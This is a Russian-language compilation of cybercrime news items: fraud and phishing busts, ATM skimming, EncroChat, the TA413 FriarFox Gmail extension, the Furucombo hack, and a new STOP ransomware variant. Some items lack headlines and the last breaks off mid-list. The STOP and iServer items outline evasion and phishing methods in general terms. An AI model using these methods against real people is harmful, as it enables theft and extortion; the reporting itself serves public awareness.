Согласно правилам, первый человек, отправивший свой NFT в Input Output Global (IOG), получит вознаграждение в размере 1 млн USDM. Для того чтобы претендовать на вознаграждение, участники конкурса обязаны придерживаться правил, включая прохождение процедуры идентификации пользователя (KYC) и раскрытие любых уязвимостей, используемых исключительно IOG. При этом соискателям запрещено использовать для взлома кошелька тактику социальной инженерии.
Ранее создатель блокчейна Cardano заявил, что блокчейн Биткоина не развивается, поэтому сеть Cardano вполне способна превзойти сеть Биткоина, а монета ADA — стать крупнейшей криптовалютой.
Что ждет того, кто осмелился саботировать систему Red Notice?
В результате расследования международных правоохранительных органов была раскрыта преступная организация, действовавшая в Молдове и подозреваемая в попытке саботировать систему Интерпола, помогающую странам-участницам определять местонахождение и арестовывать разыскиваемых преступников по всему миру.
Молдавские власти при участии французских прокуроров и ФБР провели более 30 обысков и задержали четырех подозреваемых, связанных с Беларусью, Россией и Украиной.
Предполагается, что подозреваемые пытались неправомерно использовать систему Red Notice — инструмент для оповещения 195 стран-участниц о лицах, разыскиваемых в рамках уголовного преследования или просто на основании ордера.
«Преступники платили посредникам и публичным лицам в Молдове, чтобы информировать преследуемых лиц об их статусе в системе Red Notice», — заявила глава антикоррупционного ведомства Молдовы Вероника Драгалин. Интерпол также обнаружил попытки «блокировать и удалять» уведомления о розыске.
По данным молдавского отделения Radio Free Europe, предполагаемые суммы, выплаченные участниками этой схемы, составляют несколько миллионов долларов.
Национальное криминальное агентство Великобритании (NCA) также заявило, что ему удалось установить личности ключевых фигур в Молдове, получавших взятки от членов преступной сети, однако их имена не раскрываются.
«Эти коррумпированные чиновники злоупотребляли своим положением, предоставляя услуги, позволявшие некоторым из самых опасных преступников в мире свободно путешествовать и избегать ареста», — заявил директор NCA Пол Фостер.
Интерпол уже сообщил, что ввел «дополнительные меры» для обеспечения безопасности системы и предотвращения подобных инцидентов в будущем. По словам генерального секретаря ведомства, Юргена Штока, сейчас в розыске находится 70 000 человек.
«Хотя мы уверены в надежности наших систем, мы должны убедиться, что точно не допустим их неправомерного использования», — подчеркнул он.
В ходе операции под названием Magictheft сотрудники испанской Гражданской гвардии ликвидировали преступную банду, которая занималась мошенничеством с криптовалютой.
Об этом сообщается в опубликованном пресс-релизе правоохранительных органов страны, на который ссылается агентство La Razon, испанская радиостанция Cadena Ser.
В материале указывается, что арестованы 12 членов группировки. В ее состав входили выходцы из Казахстана, Молдавии, а также России и Украины, в возрасте от 19 до 49 лет. По предварительным данным, задержанные совершили махинации на сумму более чем 50 тысяч евро в криптовалюте.
Отмечается, что злоумышленники смогли осуществить около 20 мошеннических операций в разных частях королевства. Данное расследование было проведено совместно со специалистами Европейского полицейского агентства (Европола) и Интерпола.
Аресты состоялись в провинциях Барселона и Валенсия. При этом группировка работала в Барселоне, Таррагоне, Валенсии и Дубае (ОАЭ).
Уточняется, что в настоящее время выбранная преступниками схема мошенничества считается очень популярной. Она основывается на едва различимом написании суммы перевода. В частности, имеется ввиду 2.500 USDT и 2,500 USDT.
sc: cadenaser.com/comunitat-valenciana/2024/03/24/la-guardia-civil- desarticula-una-organizacion-criminal-dedicada-a-cometer-estafas-con- criptomonedas-radio-valencia
Столичные оперативники задержали троих иностранцев из ближнего зарубежья, которые подделывали документы в арендованном офисном помещении. Как передает МВД-Медиа, в дальнейшем они использовались в мошеннических операциях. В частности, на них оформлялись карточки российских банков.
«Предварительно установлено, что иностранцы, один из которых ранее судим за аналогичное преступление, с помощью графических редакторов и оргтехники изготавливали большой ассортимент подделок — паспорта иностранных граждан, миграционные карты, водительские удостоверения. При этом имитировались защитные элементы, в том числе голограммы», — рассказала официальный представитель МВД страны Ирина Волк.
Она добавила, что на след преступников удалось выйти во время расследования дела о краже денег у кредитных организаций с помощью поддельных документов. Оформляя на сайтах банков заявки на получение кредитных карт, они назначали встречу курьеру в людных местах (кафе и торговых центрах), в которых можно быстро затеряться в случае возникновения подозрений.
«Прибывшие для подписания договоров представители организаций не всегда ответственно относились к проверке предоставленных клиентами документов. Им выдавали карты, заемные средства с которых снимались и похищались. В настоящее время ущерб от реализации криминальной схемы оценивается более чем в 10 миллионов рублей», — констатировала Волк.
mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-v-moskve-sotrudniki-mvd- rossii-presekli-deyatelnost-nelegalnoy-tipografii-i-izyali-iz-obo
Использование вредоносного ПО
• Злоумышленники из Северной Кореи используют Python для распространения
вредоносной программы PondRAT.
• PondRAT является облегченной версией POOLRAT, известного бэкдора для macOS.
• Атаки являются частью кампании "Операция "Работа мечты"", направленной на
обман жертв для загрузки вредоносного ПО.
Анализ и последствия атак
• Атаки направлены на получение доступа к поставщикам цепочки поставок и
клиентам.
• Удаленные пакеты Python, загруженные в PyPI, содержат вредоносные программы.
• PondRAT имеет сходство с POOLRAT и AppleJeus, расширяя возможности атак.
• Использование вредоносных пакетов Python представляет риск для организаций.
Деятельность северокорейских ИТ-специалистов
• Северокорейские ИТ-специалисты используют украденные идентификационные
данные для получения работы в западных компаниях.
• Они работают удаленно, используя различные инструменты для подключения к
ноутбукам.
• Их деятельность направлена на получение финансовой выгоды и шпионаж.
• ИТ-специалисты из КНДР представляют постоянную и растущую киберугрозу.
Правоохранительные органы сообщили о ликвидации международной преступной группы, которая использовала автоматизированную фишинговую платформу iServer для разблокировки украденных и потерянных смартфонов. Суммарно от рук злоумышленников пострадали 483 000 человек по всему миру.
Операция под кодовым названием Kaerb, в которой принимали участие правоохранительные и судебные органы Испании, Аргентины, Чили, Колумбии, Эквадора и Перу, началась еще в 2022 году. Именно тогда Европол получил информацию о злоумышленниках от специалистов компании Group-IB, которая помогала властям выявить жертв и преступников, стоявших за этой фишинговой активностью.
Как рассказывают в Group-IB, платформа iServer существовала с 2018 года и автоматизировала фишинговые атаки, создавая вредоносные страницы, имитирующие популярные облачные мобильные платформы.
Операторы iServer помогали низкоквалифицированным злоумышленникам, известным как разблокировщики (unlockers), на руках у которых были украденные телефоны, которые нужно разблокировать. Разблокировщики использовали платформу для автоматизации фишинговых атак через электронные письма, SMS или голосовые звонки, чтобы похищать учетные данные жертв.
С помощью фишинга хакеры собирали все данные, необходимые им для разблокировки ворованных или потерянных телефонов (включая пароли к устройствам, учетные данные пользователей и личную информацию), и обхода режима «Lost Mode», что в итоге позволяло отрезать устройств от их бывших владельцев.
К примеру, пользователи iServer могли создать фишинговую страницу и отправить жертве SMS с вредоносной ссылкой. SMS выглядело как сообщение от Apple, и по ссылке владельцу утраченного устройства обещали подробно рассказать о том, как найти девайс.
Однако на самом деле ссылка перенаправляла жертву на фишинговую страницу, где злоумышленники собирали учетные данные, необходимые для разблокировки устройства.
В общей сложности на iServer было зарегистрировано более 2000 разблокировщиков, которые предоставляли услуги по разблокировке телефонов другим преступникам. Платформа использовалась для атак на владельцев 1,2 млн телефонов по всему миру.
В результате операции Kaerb удалось выявить 483 000 жертв (в основном испаноязычных граждан из стран Европы, Северной и Южной Америки) которые подверглись фишингу во время попыток вернуть доступ к своим устройствам.
Схема работы iServer
Сообщается, что с 10 по 17 сентября 2024 года правоохранительные органы арестовали 17 подозреваемых в Аргентине, Чили, Колумбии, Эквадоре, Перу и Испании, провели 28 обысков и изъяли множество улик, включая мобильные телефоны, другие электронные устройства, люксовые автомобили и оружие.
Среди задержанных был и администратор фишинговой платформы. Им оказался гражданин Аргентины, который управлял сервисом более пяти лет.
• Source: https://www.europol.europa[.]eu/media-press/newsroom/news/criminal- phishing-network-resulting-in-over-480-000-victims-worldwide-busted-in-spain- and-latin-america
• Source: https://www.group-ib[.]com/media-center/press-releases/operation- kaerb/
Днепровский райнный суд Киева признал гражданина Польши Марчина Войтаса виновным в мошенничестве, подделке платежных карточек и незаконном вмешательстве в работу электронно-вычислительных машин.
Об этом сообщает «Судебный репортер» со ссылкой на приговор от 28 августа.
Осенью 2020 года иностранец устанавливал на банкоматы в разных районах столицы скимминговые устройства для считывания банковской информации карт клиентов и видеофиксации мини камерой чиловых комбинаций (паролей).
Чтобы избежать разоблачения, мужчина снимал записанную на банкомате информацию в течение 24 часов. На основе полученных сведений он подделывал карты и затем снимал через банкоматы деньги, выдавая себя за реальных клиентов «Приватбанка».
За последние два месяца перед задержанием Войтасу, по версии обвинения, удалось присвоить более 1 млн гривен. В четырех случаях средства сняты не были, поскольку банковская система «ПриватБанка» обнаружила компроментацию карт и заблокировала их, сохранив клиентам 300 тысяч гривен.
28 ноября 2020 года в 6 утра злоумышленник подошел к банкомату «ПриватБанка» на улице Андрея Малышко и установил считывающее устройство и миниатюрную видеокамеру.
На следующий день примерно в 11:50 Войтас пришел в банкомат и с помощью кустарно произведенной пластины и пинцетов пытался снять оборудование. Но был задержан с поличным работниками полиции.
Как выяснилось, накануне в полицию об установке считывающего устройства на банкомат сообщила аптека «Доброго дня», находящаяся на расстоянии двух метров.
Утром 29 ноября полицейские полтора часа наблюдали за банкоматом с расстояния примерно 10 метров, чтобы задержать преступника. Работники полиции имели при себе фотографии подозреваемого из предыдущих банкоматов. Когда мужчину задержали и заставили показать сумку, то внутри были инструменты и устройства, которые относятся к скимингу, а именно: щипцы, металлические карточки, банковские карты без номеров.
Как написано в приговоре, Войтас действовал совместно с лицами, материалы в отношении которых выделены в отдельное уголовное производство и неустановленными досудебным расследованием лицами.
В суде он в начале рассмотрения дела признал вину частично, однако во время допроса воспользовался правом не давать показания, а в судебных прениях сообщил, что не признает свою вину полностью. Вместе с тем учитывается его содействие суду в рассмотрении дела путем обеспечения переводчика в судебные заседания.
Суд обратил внимание на молодой возраст и удовлетворительное состояние здоровья мужчины. Обвиняемый не женат, иностранец, официально не работает, ранее не судим на территории Украины.
Были учтены характеризующие материалы в отношении обвиняемого, а именно, что он неоднократно привлекался к уголовной ответственности в других странах.
В феврале 2020 года полиция Эстонии возбудила уголовное дело в отношении Войтаса и объявила его в розыск за мошенничество и подделку документов.
В прошлом его также обвиняли в грабежах, мошенничестве и получении взятки.
В 2013-м Войтаса арестовали в Базеле, на границе с Францией, поскольку он имел поддельное болгарское удостоверение личности и так пытался нелегально въехать в Швейцарию. Войтас был экстрадирован в Германию на основании постановления суда Дрездена о задержании. В 2013 году он также был объектом расследования в Австрии.
В 2014 году местный суд Дрездена приговорил Войтаса к 4 годам 9 месяцам тюремного заключения за манипуляции со скиммингом в банкомате. В 2016-м после отбытия части наказания его выслали из Германии.
С учетом всех обстоятельств украинский суд назначил Войтасу 5 лет лишения свободы. До вступления приговора в законную силу он не находится под стражей и может обжаловать судебное решение. В 2020-м, после задержания, он провел в СИЗО полтора месяца и освободился под залог в 315 тысяч гривен.
«ПриватБанк» является потерпевшим по делу. Но суд не принял его гражданский иск из-за недостатков в оформлении, которые банк так и не исправил. По закону, потерпевший вправе предъявить гражданский иск в порядке гражданского судопроизводства.
• Source: https://reyestr.court[.]gov.ua/Review/121248056
Сегодня в Нью-Йорке был консенсусом принят проект конвенции ООН против киберпреступности (A/AC.291/L.15). Расширенное название «Укрепление международного сотрудничества в борьбе с определенными преступлениями, совершаемыми с использованием информационно- коммуникационных систем, и в обмене доказательствами в электронной форме, относящимися к серьезным преступлениям».
Этому предшествовали два с половиной года переговоров в Спецкомитете по разработке конвенции, а до этого несколько лет дипломатических усилий России, по чьей инициативе и была запущена разработка нового инструмента — универсального по сравнению с такими документами, как Будапештская конвенция (2001) Совета Европы, которую Москва критиковала как устаревшую, а также допускающую вмешательство во внутренние дела.
Россия предлагала существенно расширить охват конвенции, включив в него 23 вида правонарушений. Однако такой подход разделяли не все страны: активно включившиеся в работу над документом США и Европа выступали за более узкий охват, который ограничивался бы чисто компьютерными преступлениями. Согласно итоговому проекту, криминализованы должны быть 10 видов правонарушений (в т.ч. незаконный доступ, незаконный перехват, неправомерное использование устройств, хищение или мошенничество с использованием информационно-коммуникационных систем, распространение материалов с надругательствами или сексуальной эксплуатацией детей, груминг, распространение интимных изображений без согласия) а также отмывание доходов от преступлений.
Конвенция содержит раздел о международном сотрудничестве, направленный на улучшение взаимодействия между странами. В нём прописаны правила передачи персданных, выдачи преступников, передачи уголовного производства. Конвенция предусматривает функционирование сети связи в формате 24/7 между контактными центрами государств-участников.
Хотя Россия и является инициатором выработки новой конвенции, её не устраивает не только узкий охват, к которому в итоге пришли переговорщики, но и другие моменты, например, положения, касающиеся прав человека (борьба за исключение их шла до последнего момента — на заседании Иран вынес на голосование несколько пунктов, с которыми была не согласна и Россия). Само упомианание слова «киберпреступность» в названии вызвало несогласие у России, и соответствующая оговорка будет сделана при подписании и ратификации конвенции. Но и у западных стран (да и и не только западных) были свои претензии к документу. Так что результат потребовал ото всех участников компромиссов.
Вместе с проектом конвенции приняты проект соответствующей резолюции Генассамблеи, а также примечания по толкованию некоторых статей. Сегодня все переговорщики были очень рады успешному завершению работы. Но впереди много дел: официальное подписание и ратификация конвенции участниками, её имплементация на национальном уровне. В какой степени новый инструмент реально поможет борьбе с преступностью, можно будет узнать ещё не скоро.
Бывший замминистра осужден по делу о злоупотреблении полномочиями
Савеловский суд Москвы вынес приговор по уголовному делу бывшего заместителя министра связи РФ Алексея Солдатова и гендиректора ООО «Релком Групп» Евгения Антипова. Им инкриминировалось злоупотребление полномочиями: как установили следствие и суд, в 2018 году подсудимые вывели из России около 490 тыс. IP- адресов четвертой версии протокола (IPv4) в пользу чешской компании Reliable Communications s.r.o. Впрочем, впоследствии трансфер IP-адресов был отменен. В итоге Алексею Солдатову назначено два года колонии-поселения, а Евгению Антипову — полтора.
Алексей Солдатов и Евгений Антипов, которые к моменту оглашения приговора находились на свободе под подпиской о невыезде, прибыли в здание Савеловского суда в окружении родных и адвокатов. Само заседание много времени не заняло. Из оглашенного судебного решения следовало, что оба подсудимых признаны виновными в «злоупотреблении полномочиями с причинением существенного вреда правам и законным интересам граждан» (ч. 1 ст. 201 УК РФ) и приговорены соответственно к двум и полутора годам колонии-поселения. В прениях прокурор требовал отправить каждого туда же на три года.
Бывшего замминистра Алексея Солдатова и гендиректора ООО «Релком Групп» Евгения Антипова задержали 12 декабря 2019 года в рамках уголовного дела, возбужденного изначально главным следственным управлением столичной полиции по ч. 4 ст. 159 УК РФ (мошенничество в особо крупном размере). После допросов в качестве обвиняемых фигурантов доставили в Тверской райсуд Москвы, который отправил обоих под домашний арест, хотя следствие ходатайствовало о заключении их под стражу. В 2020 году обоих отпустили под подписку о невыезде.
В основу фабулы дела была положена история с выводом в 2018 году около 490 тыс. IP-адресов из Российского научно-исследовательского института развития общественных сетей (РосНИИРОС) в пользу чешской компании Reliable Communications s.r.o.
От РосНИИРОС соответствующий договор подписал Евгений Антипов. Как ранее рассказывал «Ъ», это произошло незадолго до прекращения деятельности локального интернет-регистратора (Local Internet Registry, LIR), распределяющего IP-адреса. Как писал «Ъ», многие клиенты LIR РосНИИРОС, в том числе коммерческие и государственные структуры, после прекращения его деятельности оказались вынуждены платить за аренду IP-адресов чешской структуре, что сопровождалось повышением тарифов.
Впоследствии сделка была отменена.
В 2022 году обвинение было переквалифицировано с мошенничества на злоупотребление полномочиями. В окончательной редакции говорилось, что в результате заключенных сделок АНО «РосНИИРОС» лишилось способности осуществлять деятельность, связанную с распределением адресного пространства, а также возможности извлечь доход в размере 3 196 710 руб. за период с 5 апреля 2019 года по 31 декабря 2022-го.
Алексей Солдатов и Евгений Антипов ни на следствии, ни в суде вины не признали, настаивая на том, что следствие необоснованно перевело в уголовную плоскость обычную гражданско-правовую сделку.
Адвокаты также настаивали на оправдании подзащитных, указывая, что подобные трансферы адресов в то время, когда возбуждалось дело, были обычной практикой и не противоречили закону. Они также напоминали о прежних заслугах Алексея Солдатова. Напомним, доктор физико-математических наук Алексей Солдатов до 2008 года работал в Институте ядерной энергии имени Курчатова (ныне — НИЦ «Курчатовский институт»). При его участии в 1990 году там была создана информационная сеть «Релком», которую принято связывать с появлением интернета в стране и с дальнейшим возникновением рунета. В 1995–1998 годах был советником гендиректора ФАПСИ, руководил проектом «Деловая сеть России».
С 2008 по 2010 год занимал должность замминистра связи и массовых коммуникаций РФ, курировал стратегическое и научно-техническое развитие отрасли, руководил проектом «Развитие суперкомпьютеров и грид-технологий». В 2010 году был проректором МГУ, затем — советником ректора. Является автором более 60 научных работ, за что в 2010 году был награжден почетной грамотой президента РФ и благодарностью министра связи и массовых коммуникаций. Также Алексей Солдатов дважды становился лауреатом «Премии рунета» и Курчатовской премии.
После оглашения вводной и резолютивной частей приговора в зал вошел конвоир, попросивший Алексея Солдатова и Евгения Антипова зайти в клетку для подсудимых. На них надели наручники, а затем увели в конвойное помещение.
• Source: https://www.kommersant.ru/doc/6850054
В Европоле сообщили, что из них 197 человек являлись наиболее разыскиваемыми преступниками
Ликвидация сервиса для зашифрованной связи EncroChat, активно использовавшегося ОПГ, с 2020 года позволила арестовать более 6,5 тыс. человек. Об этом сообщило во вторник Европейское полицейское агентство (Европол).
«В общей сложности по всему миру было задержано 6 558 человек, в том числе 197 наиболее разыскиваемых преступников», - отметили в организации, которая оказала поддержку Франции и Нидерландам в создании совместной следственной группы, непосредственно ликвидировавшей сервис. Во вторник голландские и французские представители правоохранительных органов представили в Лилле первые детальные результаты этой операции.
Попавшая в распоряжение правоохранительных органов переписка между злоумышленниками позволила не только провести аресты, но и изъять более €900 млн, тонны наркотиков и сотни единиц оружия. Полученная информация не только использовалась голландскими и французскими властями, но также предоставлялась коллегам из других стран ЕС и передавалась третьим сторонам по запросу.
«Ликвидация EncroChat в 2020 году потрясла организованные преступные группировки в Европе и за ее пределами, - отметили в Европоле. - Это помогло предотвратить нападения с применением насилия, покушения на убийство, коррупцию и крупномасштабную перевозку наркотиков, а также получить огромные объемы информации об организованной преступности».
source: europol.europa.eu/media-press/newsroom/news/dismantling-encrypted- criminal-encrochat-communications-leads-to-over-6-500-arrests-and-close-to- eur-900-million-seized
Ferrari has disclosed a data breach following a ransom demand received after attackers gained access to some of the company’s IT systems.
https://www.bleepingcomputer[.]com/...es-data-breach-after-receiving-ransom- demand/
Специалисты ИБ-компании Proofpoint рассказали о китайской киберпреступной группировке, взламывающей учетные записи Gmail с помощью расширения для браузера.
Киберпреступная группировка TA413 активна уже почти десять лет и обычно связывается экспертами с вредоносным ПО LuckyCat и ExileRAT, а ее жертвами в основном являются тибетцы. В начале 2021 года TA413 пыталась атаковать учетные записи Gmail организаций в Тибете с помощью вредоносного расширения для браузера.
По словам экспертов, в январе-феврале нынешнего года группировка доставляла на атакуемые компьютеры расширение FriarFox для браузера Firefox, предоставляющее ей контроль над принадлежащей жертвам почтой Gmail. В ходе атак также использовалось вредоносное ПО Scanbox и Sepulcher, ранее уже связанное ИБ- экспертами с TA413.
Злоумышленники рассылали жертвам фишинговые письма с ссылкой на поддельную страницу обновления Adobe Flash Player, запускающую на атакуемых системах JavaScript-код. Этот код доставлял вредоносное расширение FriarFox, но только в случае, если ссылка открывалась через Firefox.
После установки расширение предоставляло атакующим полный контроль над Gmail жертвы. Злоумышленники могли осуществлять поиск по письмам, архивировать сообщения, читать переписку, получать уведомления, помечать письма как спам, удалять письма, обновлять входящие, переадресовывать письма, модифицировать уведомления браузере, удалять навсегда письма из корзины и отправлять сообщения.
FriarFox представляет собой сильно видоизмененную версию расширения с открытым исходным кодом Gmail Notifier, предоставляющую злоумышленникам доступ к данным пользователей для всех сайтов и позволяющую просматривать и менять настройки конфиденциальности, отображать уведомления и получать доступ к открытым в браузере вкладкам.
• Source: [https://www.proofpoint.com/us/blog/...rowser-extension-target- gmail-accounts-global](https://www.proofpoint.com/us/blog/threat- insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts- global)
Команда Furucombo сообщила, что злоумышленник скомпрометировал прокси-сервер DeFi-проекта, ущерб составил около $14 млн в Ethereum и токенах ERC-20.
__https://twitter.com/x/status/1365743632460910593
Click to expand...
Furucombo предоставляет пользователям инструмент, который позволяет визуально комбинировать цепочки транзакций с различными DeFi-протоколами.
По словам исследователя The Block Игоря Игамбердиева, хакер использовал поддельный контракт, который заставил Furucombo решить, что Aave v2 имеет новую имплементацию. Это дало возможность при взаимодействии с этим DeFi- протоколом переводить одобренные токены на произвольный кошелек.
__https://twitter.com/x/status/1365740713334493192
Click to expand...
Эксперт привел перечень украденных активов.
Взлом произошел в 16:47 UTC. Команда проекта считает, что исправила уязвимость, но из соображений безопасности рекомендовала пользователям удалить одобрение токенов.
В Furucombo обещали уведомить сообщество о дальнейших предпринимаемых действиях.
Согласно данным Etherscan, хакер активно выводит похищенные активы, в том числе с помощью сервиса микширования Tornado Cash.
• Source: https://etherscan.io/address/0xb624e2b10b84a41687caec94bdd484e48d76b212
Оперативники УУР УМВД России по Тульской области совместно с сотрудниками регионального УФСБ России задержали безработного местного жителя. Он подозревается в мошенничестве, совершенном группой лиц по предварительному сговору.
«Согласно имеющимся в распоряжении следствия данным, злоумышленник вел незаконную деятельность с мая текущего года. В мессенджере он нашел анонимное предложение заработать и стал выполнять указания неизвестного куратора. Мужчина арендовал офисные помещения и установил в них оборудование для удаленного доступа к сотовым сетям российских операторов мобильной связи. В дальнейшем его обязанностями стали монтаж, настройка и обслуживание техники, а также регулярная замена сим-карт», – рассказала официальный представитель МВД России Ирина Волк.
По словам фигуранта, он осознавал, что стал участником криминальных схем дистанционного мошенничества. Его действия позволили преступникам в течение нескольких месяцев похищать денежные средства граждан.
«В ходе обыска по месту жительства задержанного и в используемых им офисах полицейские изъяли компьютер, три сим-пула емкостью в 512 сим-карт каждый, шесть сим-боксов, три роутера, а также около трех тысяч сим-карт. В ходе проверки оперативники выяснили, что с помощью привязанных к ним телефонных номеров совершено как минимум 72 мошенничества. Большинство потерпевших – жители Москвы, Московской, Калужской и Тульской областей», – сообщила Ирина Волк.
Следователем следственного отдела ОП «Скуратовский» УМВД России по городу Туле продолжается расследование уголовного дела по признакам преступления, предусмотренного частью 2 статьи 159 УК РФ. Фигуранту избрана мера пресечения в виде домашнего ареста.
«Устанавливаются все эпизоды противоправной деятельности и ее соучастники», – добавила Ирина Волк.
• Video: https://rutube.ru/video/f62a245ab3add85e97dc89a4415c151a/?r=plemwd
Сотрудники ГУУР МВД России, их коллеги из Ставропольского края, а также оперативники регионального УФСБ России пресекли деятельность преступного сообщества, участники которого подозреваются в вымогательстве.
«Предварительно установлено, что с февраля 2021 по сентябрь 2023 года злоумышленники создавали в популярном мессенджере и социальной сети аккаунты с вымышленными установочными данными. Под видом девушек они заходили в чаты знакомств, где знакомились с мужчинами. Когда беседы переводились в личные чаты, фигуранты начинали обмениваться с ними фото- и видеоконтентом интимного характера. Завладев номерами телефонов и другими персональными данными потерпевших, сообщники начинали вымогать деньги, угрожая отправкой компромата их друзьям и родственникам», – рассказала официальный представитель МВД России Ирина Волк.
От действий фигурантов пострадали 113 граждан из 19 регионов России. Сумма ущерба составила более 2,6 млн рублей.
В ходе обысков по местам жительства фигурантов полицейскими при силовой поддержке сотрудников Росгвардии изъяты смартфоны, оргтехника и денежные средства.
«Следователем СЧ ГСУ ГУ МВД России по Ставропольскому краю возбуждены уголовные дела по признакам преступления, предусмотренного статьями 163 и 210 УК РФ. Все материалы соединены в одно производство. В отношении 22 фигурантов избраны различные меры пресечения.
В настоявшее время устанавливаются личности и местонахождение возможных соучастников противоправной деятельности», – сообщила Ирина Волк.
mvdmedia.ru/upload/medialibrary/ab0/07hkl4skpvceg9fg5us9fi3lgu32cuwj.mp4
Исследователи обнаружили новый вариант вымогателя STOP (он же StopCrypt и STOP Djvu), который использует многоступенчатый механизм выполнения для обхода защитных средств. STOP является одним из наиболее активных и распространенных вымогателей в мире, но мало кто слышал о нем, так как он атакует не организации, а обычных пользователей.
Напомним, что детальный анализ STOP впервые был опубликован еще в 2019 году. Уже тогда специалисты предупреждали, что STOP является одной из наиболее активных угроз, наряду с популярными тогда вымогателям Ryuk, GandCrab и Sodinkibi.
Об этом шифровальщике почти не говорят и не пишут. Дело в том, что эта малварь атакует в основном любителей пиратского контента, посетителей подозрительных сайтов и распространяется в составе рекламных бандлов. Вымогатели довольствуются небольшими выкупами в размере 400-1000 долларов США, и не требуют десятки миллионов долларов, в отличие от своих «коллег».
Издание Bleeping Computer отмечает, что посвященная STOP тема на форме уже
насчитывает 807 страниц, и именно туда жертвы вымогателей часто приходят,
чтобы просить помощи у других пользователей и ИБ-экспертов.
С момента своего появления в 2018 году шифровальщик почти не изменился, и
новые версии в основном выходят для устранения критических проблем. Однако
теперь эксперты SonicWall обнаружили [новую версию
STOP](https://blog.sonicwall.com/en-us/2024/03/new-multi-stage-stopcrypt-
ransomware/), от которой может пострадать большое количество людей.
Исследователи сообщают, что теперь малварь использует многоступенчатый механизм выполнения. Так, сначала вредоносная программа загружает якобы несвязанный с ней DLL-файл (msim32.dll), возможно, в качестве отвлекающего маневра. В нем также реализована серия длинных loop-циклов с задержкой по времени, которые могут помочь обойти защитные средства, привязанные ко времени.
Затем STOP использует динамические вызовы API в стеке для выделения необходимого пространства памяти для разрешений на чтение/запись и выполнение, что дополнительно усложняет его обнаружение. Малварь применяет вызовы API для различных операций, в том числе для получения снапшотов запущенных процессов, чтобы понять, в какой среде он работает.
На следующем этапе вымогатель перехватывает легитимные процессы и внедряет в
них свою полезную нагрузку для незаметного выполнения в памяти. Это делается с
помощью ряда тщательно продуманных вызовов API, которые манипулируют памятью
процессов и потоком управления.

После выполнения итоговой полезной нагрузки осуществляется ряд действий,
направленных на закрепление в системе, изменение ACL (чтобы пользователи не
имели возможности удаления важных файлов и каталогов малвари), а также
создается запланированное задание для выполнения полезной нагрузки каждые пять
минут.
В итоге файлы жертв шифруются, и им присваивается расширение .msjd. Однако
эксперты подчеркивают, что существуют сотни других расширений, связанных со
STOP, поскольку вымогатели очень часто их меняют. Наконец, в каждой
пострадавшей папке создается файл _readme.txt, в котором жертв инструктируют,
как оплатить выкуп и восстановить данные.

Законопроект уже принят в Луизиане и сейчас рассматривается в других штатах.
В январе штат Луизиана принял закон, который обязывает сайты, размещающие контент для взрослых, требовать подтверждение возраста пользователя. Причём подтверждение требуется не простым нажатием кнопки, а предоставлением специального оцифрованного удостоверения личности. В ином случае доступ к сайту будет ограничен.
После принятия закона в Луизиане, ещё семь штатов выступили за принятие такого же закона на своей территории. Главная идея законопроекта заключается в том, чтобы оградить несовершеннолетних пользователей Интернета от вредного для них контента.
Согласно законопроекту, сайты, «значительная часть» контента которых состоит из «вредных для несовершеннолетних» материалов, включая демонстрацию половых органов, актов совокупления, а также не имеющих «литературной, художественной, политической или научной ценности», — должны в обязательном порядке запрашивать у пользователей удостоверение личности.
Так PornHub*, один из самых популярных порнографическиих сайтов в мире, уже запрашивает подтверждение возраста перед входом на сайт у пользователей с луизианскими IP-адресами. То же самое скоро ждёт и жителей других регионов США.
Сенатор-республиканец Тайлер Диз, главный спонсор законопроекта, заявил, что был вдохновлен многими избирателями в его округе, обеспокоенных растущими проблемами, связанными с порнографией. «Я надеюсь, что мы защитим наших детей и их невиновность в штате Арканзас, а затем направим сообщение по всей стране, что нам нужно что-то подобное, встроенное в федеральный закон», — сказал Диз.
Вне всяких сомнений, американские избиратели стремятся сделать благое дело, сделав ещё один шаг к тому, чтобы полностью оградить несовершеннолетних от вредного контента. Однако с точки зрения конфиденциальности и анонимности в интернете, законопроект очень сомнительный.
Если паспортные данные пользователей подобных сайтов будут храниться в какой- либо базе данных, встаёт вопрос — что с ними будет при очередной утечке, вызванной хакерскими атаками. Утечка таких данных может нанести гораздо большие репутационные ущербы конкретно взятому человеку, чем просто слив личных данных в открытый доступ.
Тем не менее, потенциального вреда от законопроекта будет, вероятно, гораздо меньше, чем неоспоримой пользы. Посмотрим, будет ли законопроект принят в остальных штатах США, или дело ограничится Луизианой.
Персональные данные украинцев якобы были взяты из государственного сервиса «Дия».
В базе данных содержатся следующая информация: ФИО, дата рождения, пол, номер
телефона, ИНН, данные из государственных и заграничных паспортов, данные из
ID-карт.
По словам хакера, информация представлена в форматах SQL, JPG и JSON. Всего
для предпросмотра доступен архив объемом чуть более 11 ГБ.
Продавец хочет за базу данных 15 тысяч долларов США.
Ранее аналитики заявили, что Украине угрожают разрушительные кибератаки ,
которые могут затронуть критическую инфраструктуру страны.
Напомним 14 января хакеры взломали сайты ряда министерств правительства
Украины. По предварительным данным, к взлому причастна хакерская группировка
UNC1151, которую подозревают в связях с разведслужбами Белоруссии.
Подразделение по расследованию финансовых преступлений при Министерстве
финансов США, также известное как FinCEN,
[отчиталось](https://www.fincen.gov/news/news-releases/ransomware-trends-bank-
secrecy-act-data-between-january-2021-and-june-2021) о выявлении биткоин-
транзакций на сумму около 5,2 миллиарда долларов. Все эти средства специалисты
связывают с активностью шифровальщиков.
Представители FinCEN пишут, что это число было получено после анализа 2184
отчетов о подозрительной активности, поданных финансовыми учреждениями США за
последнее десятилетие (с 1 января 2011 года по 30 июня 2021 года). Хотя
изначально отчеты выявили подозрительную деятельность на сумму 1,56 млрд
долларов, последующее изучение десяти наиболее распространенных программ-
вымогателей обнаружило дополнительные транзакции на сумму около 5,2 млрд
долларов, связанные исключительно с этими хак-группами.
В общей сложности эксперты FinCEN идентифицировали 177 адресов кошельков CVC («конвертируемой виртуальной валюты»), которые использовались для платежей, связанных с шифровальщиками.
[](https://xakep.ru/wp- content/uploads/2021/10/362113/Transactions-linked-to-most-common-ransomware- variants.png)
Хотя отчет FinCEN содержит данные и о довольно старых атаках, большая часть расследования была сосредоточена на первой половине 2021 года и анализе последних тенденций. Итоги этого анализа таковы:
Также аналитики FinCEN отмечают несколько тенденций в области операций по отмыванию денег с помощью вымогателей. В их числе:
